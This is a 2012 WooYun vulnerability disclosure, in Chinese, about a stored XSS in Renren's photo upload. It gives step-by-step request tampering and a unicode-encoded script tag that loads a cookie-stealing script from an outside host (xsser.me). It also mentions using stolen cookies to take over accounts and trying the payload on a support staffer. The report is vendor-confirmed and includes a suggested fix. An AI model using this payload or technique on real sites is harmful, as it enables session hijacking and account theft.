当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010713

漏洞标题:人人网某处存储型XSS,居然跨不了客服妹子。。。

相关厂商:人人网

漏洞作者: imlonghao

提交时间:2012-08-08 23:04

修复时间:2012-09-22 23:05

公开时间:2012-09-22 23:05

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-08: 细节已通知厂商并且等待厂商处理中
2012-08-09: 厂商已经确认,细节仅向厂商公开
2012-08-19: 细节向核心白帽子及相关领域专家公开
2012-08-29: 细节向普通白帽子公开
2012-09-08: 细节向实习白帽子公开
2012-09-22: 细节向公众公开

简要描述:

欢迎人人网回来,特发此洞!
某处一个存储型的XSS,看了就中,还会同步到新鲜事~~
客服妹子太聪明,居然跨不了她。。。
目测木有设置HTTPONLY,获取COOKIES后轻松入侵~~
目测还有红包?嘿嘿。。

详细说明:

相册中,上传一张相片,目测对photos过滤不严格,再次目测貌似什么都没过滤,所以就产生了XSS。
再加上没有设置HTTPONLY,所以拿到了cookies后就可以随意进入你的人人网了哦~~
另外,客服很聪明,居然跨不了他,呜呜。。。

漏洞证明:

测试地址:

http://photo.renren.com/photo/sp/foA-BJTryEQ


过程如下:
在相册中随意上传一张相片,到发布的时候截包。放过前面几个包,到http://upload.renren.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/[YOUR ID]/finish_upload/v1.0的时候停下。


关键就是其中的photos参数~
信息如下,

%5B%7B%22code%22%3A0%2C%22msg%22%3A%22%22%2C%22filename%22%3A%22nofilename.jpg%22%2C%22filesize%22%3A814%2C%22width%22%3A292%2C%22height%22%3A250%2C%22images%22%3A%5B%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22large%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fmain_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22main%22%2C%22width%22%3A200%2C%22height%22%3A171%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Ftiny_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22tiny%22%2C%22width%22%3A50%2C%22height%22%3A50%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fhead_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22head%22%2C%22width%22%3A100%2C%22height%22%3A85%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22xlarge%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%5D%2C%22tempID%22%3A%22fileItem335152128_0%22%2C%22title%22%3A%22%22%7D%5D


URIComp解码,得到

[{"code":0,"msg":"","filename":"nofilename.jpg","filesize":814,"width":292,"height":250,"images":[{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg","type":"large","width":292,"height":250},{"url":"fmn061/20120808/1520/main_rEuR_1b880000eece118d.jpg","type":"main","width":200,"height":171},{"url":"fmn061/20120808/1520/tiny_rEuR_1b880000eece118d.jpg","type":"tiny","width":50,"height":50},{"url":"fmn061/20120808/1520/head_rEuR_1b880000eece118d.jpg","type":"head","width":100,"height":85},{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg","type":"xlarge","width":292,"height":250}],"tempID":"fileItem335152128_0","title":""}]


目测,通常这种都没有过滤js unicode后的代码。
所以我们将JS代码unicode一下。

"><script src=http://xsser.me/pIQKKz></script>


\u0022\u003e\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e


将UNICODE后的插在图片地址的后面。

[{"code":0,"msg":"","filename":"nofilename.jpg","filesize":814,"width":292,"height":250,"images":[{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg\u0022\u003e\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e","type":"large","width":292,"height":250},{"url":"fmn061/20120808/1520/main_rEuR_1b880000eece118d.jpg","type":"main","width":200,"height":171},{"url":"fmn061/20120808/1520/tiny_rEuR_1b880000eece118d.jpg","type":"tiny","width":50,"height":50},{"url":"fmn061/20120808/1520/head_rEuR_1b880000eece118d.jpg","type":"head","width":100,"height":85},{"url":"fmn061/20120808/1520/original_rEuR_1b880000eece118d.jpg","type":"xlarge","width":292,"height":250}],"tempID":"fileItem335152128_0","title":""}]


然后给他进行URIComp编码。
将这个替换fiddler中的photo中的参数。

%5B%7B%22code%22%3A0%2C%22msg%22%3A%22%22%2C%22filename%22%3A%22nofilename.jpg%22%2C%22filesize%22%3A814%2C%22width%22%3A292%2C%22height%22%3A250%2C%22images%22%3A%5B%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%5Cu0022%5Cu003e%5Cu003c%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003e%5Cu003c%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003e%22%2C%22type%22%3A%22large%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fmain_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22main%22%2C%22width%22%3A200%2C%22height%22%3A171%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Ftiny_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22tiny%22%2C%22width%22%3A50%2C%22height%22%3A50%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Fhead_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22head%22%2C%22width%22%3A100%2C%22height%22%3A85%7D%2C%7B%22url%22%3A%22fmn061%2F20120808%2F1520%2Foriginal_rEuR_1b880000eece118d.jpg%22%2C%22type%22%3A%22xlarge%22%2C%22width%22%3A292%2C%22height%22%3A250%7D%5D%2C%22tempID%22%3A%22fileItem335152128_0%22%2C%22title%22%3A%22%22%7D%5D


图在上面~~~
然后我们打开图片开源码,果断的X了。


同时,目测在新鲜事中也会有同步。


看了看新鲜事中的源码,也有JS链接,不过貌似不运行。。。-_-||
限制了新鲜事中的JS运行?
不过也无伤大雅,其他用户看到那么奇葩的代码应该都会去点一点的。。。
点就跨~~

修复方案:

过滤photo中的输入~
只允许图片URL中出现英文和.
不如加上HTTPONLY?

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-08-09 19:00

厂商回复:

十分感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2012-08-09 06:43 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    萌妹子。

  2. 2012-08-09 09:32 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

  3. 2012-08-09 13:52 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    妹纸亮了~~

  4. 2012-08-09 14:05 | c4bbage ( 路人 | Rank:15 漏洞数:7 | var_dump($me);)

    寻妹 寻洞。

  5. 2012-08-09 18:26 | xixi ( 路人 | Rank:26 漏洞数:8 | 别瞎BB。。。。。。。。。。)

    关注

  6. 2013-03-23 22:47 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    估计没回复,是系统自己回复的。。。